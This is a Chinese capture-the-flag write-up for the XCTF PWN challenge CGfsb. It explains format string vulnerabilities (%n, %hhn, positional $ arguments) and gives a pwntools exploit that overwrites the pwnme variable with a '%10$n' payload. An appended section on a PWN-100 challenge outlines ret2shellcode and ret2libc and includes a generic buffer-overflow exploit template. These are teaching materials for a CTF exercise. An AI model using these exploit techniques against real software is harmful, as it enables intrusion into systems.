攻防世界PWN--CGfsb

本文介绍格式化字符串漏洞的基本概念及利用方法,包括常见的格式化函数如printf等,并通过实例展示了如何利用该漏洞进行攻击。

首先checksec

32位/

开了 Canary/NX保护

再运行一下

大致就是这个流程

接下来ida里面

分析C代码

分析前先get一下格式化字符串漏洞的基础知识

举3个常见的相关函数

  1. fprintf----prints to a FILE stream
  2. printf----prints to the 'stdout' stream
  3. sprintf--prints into a string

常见语法

  1. %d---打印   signed int
  2. %u---打印   unsigned int
  3. %s---打印参数地址处的字符串
  4. %x---打印hex形式的整数
  5. %p---打印指针

eg:

printf("%10c",0x41);

打印A,宽度为10

A前面会填充9个空格 

  1. %n  将当前已打印字符的个数写入参数地址处--4字节
  2. %hn------2字节
  3. %hhn-----1字节

eg:

1.printf("%10c%n",0x41,0x8048810);

打印9个空格+A,会往地址0x8048810处写入10(4字节) 

2.printf("%4132c%hhn",0x41,0x0804883B)

4132=0x1024,往地址0x0804883B处写入1字节0x24

关于$符号 

指定占位符对应第几个参数

eg:%10$x   %x对应第10个参数

 一个问题:

如果printf的参数不足,会发生什么?

假设这些参数存在,在对应的栈/寄存器上找到这些参数,将其打印出来

这样就会将栈上一些重要的信息地址泄露出来 ,向其写入后门函数,拿到shell

参数不足

32位直接泄露栈上地址/64位先泄露6个寄存器上的地址,再栈

如果  pwnme == 8 ,即可cat flag

先泄露出参数位置

 

用gdb确定参数的位置,可以发现,第10位 

接下来编写exp

 

找到pwnme的位置

from pwn import*
#p=remote("111.200.241.244",52498)
p=process('./CG')


payload=p32(0x804A068)+b'aaaa'+b'%10$n'
p.sendlineafter("please tell me your name:\n","aaaa")
p.sendlineafter("leave your message please:\n",payload)

p.sendline(payload)
p.interactive()

 

### 关于攻防世界PWN-100题目的解答 #### 解决方案概述 对于攻防世界PWN-100题目,通常涉及的是基础的缓冲区溢出攻击。这类题目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术包括但不限于返回导向编程(Return-Oriented Programming, ROP)、重定向到已知位置的shellcode执行(ret2shellcode)或是利用动态链接库中的函数实现系统命令调用(ret2libc)[^1]。 #### 技术细节 当面对没有启用地址空间布局随机化(ASLR)且未开启不可执行堆栈(NX bit off)的情况时,可以直接采用`ret2shellcode`的方式解决问题。此方法要求选手能够找到足够的空间放置自定义的shellcode,并通过控制EIP指向这段代码来完成最终的目标——通常是打开一个远程shell连接给攻击者[^3]。 如果遇到开启了NX位但是禁用了位置独立可执行文件(PIE),那么可以考虑使用`ret2libc`策略。这种方法依赖于将返回地址设置为标准C库(glibc)内的某个有用功能的位置,比如system()函数,从而间接地触发所需的恶意操作而无需注入新的机器码片段。 针对具体环境下的不同情况,还需要掌握诸如IDA Pro这样的反汇编工具来进行二进制分析工作;同时熟悉GDB调试技巧以便更好地理解程序内部逻辑并定位潜在的安全漏洞所在之处。 ```python from pwn import * # 连接到远程服务 conn = remote('challenge.ctf.games', PORT) # 发送payload前先接收初始消息 print(conn.recvline()) # 构造payload offset = 64 # 假设偏移量为64字节 junk = b'A' * offset return_address = pack('<I', 0xdeadbeef) # 替换为目标地址 exploit_payload = junk + return_address # 发送payload conn.send(exploit_payload) # 接收响应数据 result = conn.recvall() print(result.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值